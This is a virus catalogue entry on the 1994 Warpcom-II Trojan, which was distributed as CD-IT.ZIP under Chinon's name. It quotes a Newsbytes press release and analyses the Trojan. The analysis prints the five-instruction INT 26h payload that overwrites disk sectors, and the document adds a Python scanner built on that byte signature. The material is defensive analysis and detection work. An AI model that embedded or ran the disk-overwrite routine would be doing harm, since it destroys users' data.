%%File: VIRS0816.TXT
%%Name/Aliases: Warpcom-II, CD-IT.ZIP, Chinon
%%Platform: PC/MS-DOS
%%Type: Trojan, install.com in CD-IT.ZIP archive
%%Disk Location: Trojan program.
%%Features: Direct acting.
%%Damage: Overwrites first 255 (0FFh) logical sectors of drive D with garbage. Corrupts command.com.
%%Size: Overlays application, no increase
%%See Also:
%%Notes: Reported by Chinon in a press release.

> TORRANCE, CALIFORNIA, U.S.A., 1994 APR 29 (NB) -- A new "Trojan
> Horse" computer virus is on the Internet and is labeled with the
> name of the fourth largest manufacturer of compact disc read-only
> memory (CD-ROM) drives. Chinon America, Incorporated, the company
> whose name has been improperly used on the rogue program, is
> warning IBM and compatible personal computer (PC) users to beware
> of the program known as "CD-IT.ZIP."
>
> A Chinon CD-ROM drive user brought the program to the company's
> attention after downloading it from a Baltimore, Maryland
> Fidonet server. One of the clues that the virus, masquerading as
> a utility program, wasn't on the up-and-up was that it purports "to
> enable read/write to your CD-ROM drive," a physically impossible
> task.
>
> CD-IT is listed as authored by Joseph S. Shiner, couriered
> by HDA, and copyrighted by Chinon Products. Chinon America told
> Newsbytes it has no division by that name. Other clues were
> obscenities in the documentation as well as a line indicating
> that HDA stands for Haven't Decided a Name Yet.
>
> David Cole, director of research and development for Chinon, told
> Newsbytes that the company knows of no one who has actually been
> infected by the program. Cole said the virus isn't particularly
> clever or dynamic, but none of the virus software the company
> tried was able to eradicate the rogue program. Chinon officials
> declined to comment on what antivirus software programs were
> used.
>
> If CD-IT is actually run, it causes the computer to lock up,
> forcing a reboot, and then stays in memory, corrupting critical
> system files on the hard disk. Nothing but a high-level reformat
> of the hard disk drive will eradicate the virus at this point, a
> move that sacrifices all data on the drive. It will also corrupt
> any network volumes available.
>
> "We felt that it was our responsibility as a member of the
> computing community to alert Internet users of this dangerous
> virus that is being distributed with our name on it. Even though
> we have nothing to do with the virus, it is particularly
> disturbing for us to think that many of our loyal customers could
> be duped into believing that the software is ours," Cole
> explained.
>
> Chinon is encouraging anyone who might have information that
> could lead to the arrest and prosecution of the parties
> responsible for CD-IT to call the company at 310-533-0274. In
> addition, the company has notified the major distributors of
> virus protection software, such as Symantec and McAfee Associates,
> so they may update their programs to detect and eradicate CD-IT.
>
> (Linda Rohrbough/19940429/Press Contact: Rolland Going, The
> Terpin Group for Chinon, tel 310-798-7875, fax 310-798-7825;
> Public Contact: Chinon, CD-IT Information, 310-533-0274)

The "virus" is actually the Warpcom-2 Trojan in a new archive. The Trojan overwrites the copy of command.com with a short program that overwrites the D drive, followed by a run of hex FFs that pads the file out to its original length (hence "no increase" in size). The program that overwrites the D drive writes garbage to the first 255 (0FFh) logical sectors, though it does not seem to always work. The whole payload is five instructions:

    mov  al,03      ; AL = drive number (0=A, 1=B, 2=C, 3=D)
    mov  cx,00ffh   ; CX = number of sectors to write (0FFh = 255)
    mov  dx,0000h   ; DX = first logical sector to write
    int  26h        ; DOS absolute disk write
    sbb  bh,bh      ; trash

INT 26h also requires DS:BX to point to the buffer whose contents are written to disk. Since the program never sets them, the data written is whatever DS:BX happened to point at when command.com's code was entered, which is why the sectors are filled with garbage rather than a fixed pattern. A second reason the payload is unreliable: on DOS 4.0 and later, this register form of INT 26h is only valid for partitions of 32 MB or less; for larger partitions DOS requires CX=0FFFFh with DS:BX pointing to a parameter packet (32-bit starting sector, sector count, buffer pointer), and a call in the old form is rejected with the carry flag set and writes nothing, so on a large D: partition the Trojan does no damage beyond the corrupted command.com.

I tried running this on a DOS 5 machine, and it did not seem to work. Int 26 is marked as superseded in the DOS programmer's reference, so it is possible that it has been deleted.
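The five-instruction payload above assembles to a fixed byte sequence, which makes an infected command.com easy to triage without running it. The following scanner is an added example for this record, not a tool from CIAC, Chinon or any antivirus vendor. It encodes the listing above as a signature (the drive, sector count and start sector are left as wildcards so a variant aimed at a different drive still matches), decodes the operands of any hit, and measures the trailing 0FFh padding the Trojan uses to keep the file size unchanged. The two file images it scans are constructed inline for the example; they are not real captures.

```python
"""Triage a suspect command.com for the Warpcom-II INT 26h payload.

Added example; not CIAC's or Chinon's code.  The signature is the
machine-code encoding of the disassembly in the record above.  The
sample images at the bottom are constructed for illustration.
"""
import re

# Encoding of the payload listing in the record:
#   B0 03        mov  al,03      (drive 3 = D)
#   B9 FF 00     mov  cx,00ffh   (255 sectors)
#   BA 00 00     mov  dx,0000h   (start at sector 0)
#   CD 26        int  26h        (absolute disk write)
#   1A FF        sbb  bh,bh      (trash; not part of the signature)
# The immediates are captured as wildcards so a variant that targets
# another drive or sector range is still reported.
ABS_WRITE_RE = re.compile(
    rb"\xB0(.)"       # mov al, imm8   -> drive number (0=A, 1=B, ...)
    rb"\xB9(..)"      # mov cx, imm16  -> number of sectors
    rb"\xBA(..)"      # mov dx, imm16  -> first logical sector
    rb"\xCD\x26",     # int 26h        -> DOS absolute disk write
    re.DOTALL,        # the wildcard bytes may be 0x0A
)


def find_abs_disk_writes(image: bytes) -> list[dict]:
    """Return every INT 26h sequence in `image` with its decoded operands."""
    hits = []
    for m in ABS_WRITE_RE.finditer(image):
        drive = m.group(1)[0]
        hits.append({
            "offset": m.start(),
            "drive": chr(ord("A") + drive),
            "sectors": int.from_bytes(m.group(2), "little"),
            "first_sector": int.from_bytes(m.group(3), "little"),
        })
    return hits


def ff_padding_ratio(image: bytes) -> float:
    """Fraction of the file taken up by a trailing run of 0FFh bytes."""
    if not image:
        return 0.0
    stripped = image.rstrip(b"\xFF")
    return (len(image) - len(stripped)) / len(image)


def triage(image: bytes, padding_threshold: float = 0.9) -> dict:
    """Flag a file that both carries an absolute-disk-write stub and is
    almost entirely 0FFh padding, i.e. the Warpcom-II overwrite pattern."""
    hits = find_abs_disk_writes(image)
    ratio = ff_padding_ratio(image)
    return {
        "writes": hits,
        "ff_padding_ratio": ratio,
        "suspicious": bool(hits) and ratio >= padding_threshold,
    }


# Constructed sample images (hypothetical, not real files).
PAYLOAD = bytes.fromhex("B003 B9FF00 BA0000 CD26 1AFF")
TROJANED_COMMAND_COM = PAYLOAD + b"\xFF" * (1024 - len(PAYLOAD))
CLEAN_COMMAND_COM = bytes(range(255)) * 4   # arbitrary code-like bytes, no 0FFh

if __name__ == "__main__":
    for name, image in (("trojaned", TROJANED_COMMAND_COM),
                        ("clean", CLEAN_COMMAND_COM)):
        print(name, triage(image))
```

Run against a real command.com, `find_abs_disk_writes` alone is not proof of infection (legitimate disk utilities use INT 26h); it is the combination with a file that is almost all 0FFh padding that identifies this Trojan's overwrite.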